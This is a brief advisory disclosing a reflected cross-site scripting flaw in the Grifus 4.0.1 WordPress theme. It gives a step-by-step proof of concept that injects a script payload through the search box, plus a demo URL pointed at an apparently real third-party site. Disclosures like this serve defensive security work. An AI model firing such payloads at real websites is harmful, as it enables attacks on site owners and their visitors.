WordPress Grifus 4.0.1 Cross Site Scripting
Posted on 21 December 2017
====== Title: Grifus WordPress Themes XSS Vuln Version: 4.0.1 Homepage: https://mundothemes.com/grifus/ ======= Description ================ Grifus WordPress theme For movies Web POC: ======== 1. Go To Terget Web 2. Click Search box 3. Now Give This Payload in Search box " <script>prompt(document.domain)</script> " 4. Now See xss Will be Exclude Demo: ====== http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document. domain%29%3C%2Fscript%3E Mitigations ================ Update Your Themes -- Thanks Sajibe Kanti Independent Web Security Researcher <https://twitter.com/Sajibekantibd>